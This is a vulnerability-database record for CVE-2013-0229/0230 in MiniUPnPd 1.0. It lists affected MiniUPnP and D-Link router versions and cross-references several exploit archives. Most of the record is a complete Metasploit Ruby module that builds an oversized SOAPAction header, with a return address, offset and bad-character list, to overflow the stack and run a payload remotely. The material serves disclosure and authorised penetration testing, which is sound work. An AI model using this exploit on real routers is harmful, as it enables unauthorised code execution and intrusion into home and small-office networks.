ID
VAR-E-201301-0050
CVE
cve_id: | CVE-2013-0230 | Trust: 3.4 |
cve_id: | CVE-2013-0229 | Trust: 1.4 |
EDB ID
25975
TITLE
MiniUPnPd 1.0 - Remote Stack Buffer Overflow Remote Code Execution (Metasploit) - Linux remote Exploit
Trust: 0.6
DESCRIPTION
MiniUPnPd 1.0 - Remote Stack Buffer Overflow Remote Code Execution (Metasploit). CVE-2013-0230CVE-89624 . remote exploit for Linux platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | miniupnpd | model: | - | scope: | eq | version: | 1.0 | Trust: 2.1 |
vendor: | miniupnp | model: | project miniupnp | scope: | eq | version: | 1.0 | Trust: 0.6 |
vendor: | miniupnp | model: | project miniupnp | scope: | ne | version: | 1.4 | Trust: 0.6 |
vendor: | infomark | model: | imw-c920w miniupnpd | scope: | eq | version: | 1.0 | Trust: 0.6 |
vendor: | miniupnpd | model: | remote | scope: | eq | version: | 1.0 | Trust: 0.5 |
vendor: | miniupnpd | model: | stack buffer overflow | scope: | eq | version: | 1.0 | Trust: 0.5 |
vendor: | miniupnp | model: | project miniupnp | scope: | eq | version: | 1.3 | Trust: 0.3 |
vendor: | d link | model: | dir-836l | scope: | eq | version: | 1.03 | Trust: 0.3 |
vendor: | d link | model: | dir-826l 1.04b05 | scope: | - | version: | - | Trust: 0.3 |
vendor: | d link | model: | dir-636l | scope: | eq | version: | 1.03 | Trust: 0.3 |
vendor: | d link | model: | dir-626l | scope: | eq | version: | 1.03 | Trust: 0.3 |
vendor: | miniupnp | model: | project miniupnp | scope: | ne | version: | 1.3 | Trust: 0.3 |
vendor: | miniupnp | model: | project miniupnp | scope: | ne | version: | 1.1 | Trust: 0.3 |
vendor: | d link | model: | dir-836l 1.04b09 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | d link | model: | dir-826l 1.05b06 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | d link | model: | dir-636l 1.05b07 | scope: | ne | version: | - | Trust: 0.3 |
vendor: | d link | model: | dir-626l 1.04b04 | scope: | ne | version: | - | Trust: 0.3 |
EXPLOIT
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
Rank = NormalRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
'Description' => %q{
This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
present in the SOAPAction HTTP header handling.
},
'Author' =>
[
'hdm', # Vulnerability discovery
'Dejan Lukan' # Metasploit module
],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'EXITFUNC' => 'process', },
# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
# of the program is never reached)
'Payload' =>
{
'Space' => 2060,
'BadChars' => "\x00\x22",
'DisableNops' => true
},
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2013-0230' ],
[ 'OSVDB', '89624' ],
[ 'BID', '57608' ],
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
],
'Targets' =>
[
[ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
{
'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
'Offset' => 2123
}
],
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Mar 27 2013',
))
register_options([
Opt::RPORT(5555),
], self.class)
end
def exploit
#
# Build the SOAP Exploit
#
# jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
sploit = "\xeb\x2d"
# a valid action
sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"
# payload
sploit += payload.encoded
# nops
sploit += rand_text(target['Offset'] - sploit.length - 16)
# overwrite registers on stack: the values are not used, so we can overwrite them with anything
sploit += rand_text(4) # overwrite EBX
sploit += rand_text(4) # overwrite ESI
sploit += rand_text(4) # overwrite EDI
sploit += rand_text(4) # overwrite EBP
# Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
# stack points directly to the string after 'Soapaction: ', which is why we must
# throw the first value on the stack away, which we're doing with the pop ebp
# instruction. Then we're returning to the next value on the stack, which is
# exactly the address that we want.
sploit += [target.ret].pack('V')
# the ending " character is necessary for the vulnerability to be reached
sploit += "\""
# data sent in the POST body
data =
"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
"<SOAP-ENV:Envelope\r\n" +
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
">\r\n" +
"<SOAP-ENV:Body>\r\n" +
"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
"</ns1:action>\r\n" +
"</SOAP-ENV:Body>\r\n" +
"</SOAP-ENV:Envelope>\r\n"
#
# Build and send the HTTP request
#
print_status("Sending exploit to victim #{target.name} at ...")
send_request_cgi({
'method' => 'POST',
'uri' => "/",
'headers' => {
'SOAPAction' => sploit,
},
'data' => data,
})
# disconnect from the server
disconnect
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Stack Buffer Overflow Remote Code Execution (Metasploit)
Trust: 1.0
TAGS
tag: | exploit | Trust: 1.5 |
tag: | remote | Trust: 1.0 |
tag: | overflow | Trust: 1.0 |
tag: | Metasploit Framework (MSF) | Trust: 1.0 |
tag: | shell | Trust: 0.5 |
tag: | code execution | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | web | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2013-0230 | Trust: 4.0 |
db: | EXPLOIT-DB | id: | 25975 | Trust: 1.6 |
db: | NVD | id: | CVE-2013-0229 | Trust: 1.4 |
db: | EDBNET | id: | 47971 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 23837 | Trust: 0.6 |
db: | EDBNET | id: | 23462 | Trust: 0.6 |
db: | PACKETSTORM | id: | 131651 | Trust: 0.5 |
db: | PACKETSTORM | id: | 132599 | Trust: 0.5 |
db: | PACKETSTORM | id: | 121873 | Trust: 0.5 |
db: | CERT/CC | id: | VU#922681 | Trust: 0.3 |
db: | BID | id: | 57607 | Trust: 0.3 |
db: | BID | id: | 57608 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2013-0230 | Trust: 3.1 |
url: | https://nvd.nist.gov/vuln/detail/cve-2013-0229 | Trust: 1.1 |
url: | https://www.exploit-db.com/exploits/25975/ | Trust: 0.6 |
url: | https://0day.today/exploits/23837 | Trust: 0.6 |
url: | https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/922681 | Trust: 0.3 |
url: | http://miniupnp.free.fr/ | Trust: 0.3 |
url: | https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf | Trust: 0.3 |
SOURCES
db: | BID | id: | 57607 |
db: | BID | id: | 57608 |
db: | PACKETSTORM | id: | 131651 |
db: | PACKETSTORM | id: | 132599 |
db: | PACKETSTORM | id: | 121873 |
db: | EXPLOIT-DB | id: | 25975 |
db: | EDBNET | id: | 47971 |
db: | EDBNET | id: | 23462 |
LAST UPDATE DATE
2022-07-27T09:12:10.250000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 57607 | date: | 2013-01-28T00:00:00 |
db: | BID | id: | 57608 | date: | 2015-05-12T19:46:00 |
SOURCES RELEASE DATE
db: | BID | id: | 57607 | date: | 2013-01-28T00:00:00 |
db: | BID | id: | 57608 | date: | 2013-01-28T00:00:00 |
db: | PACKETSTORM | id: | 131651 | date: | 2015-04-27T15:55:55 |
db: | PACKETSTORM | id: | 132599 | date: | 2015-07-08T00:53:09 |
db: | PACKETSTORM | id: | 121873 | date: | 2013-06-05T00:50:31 |
db: | EXPLOIT-DB | id: | 25975 | date: | 2013-06-05T00:00:00 |
db: | EDBNET | id: | 47971 | date: | 2013-06-05T00:00:00 |
db: | EDBNET | id: | 23462 | date: | 2015-07-08T00:00:00 |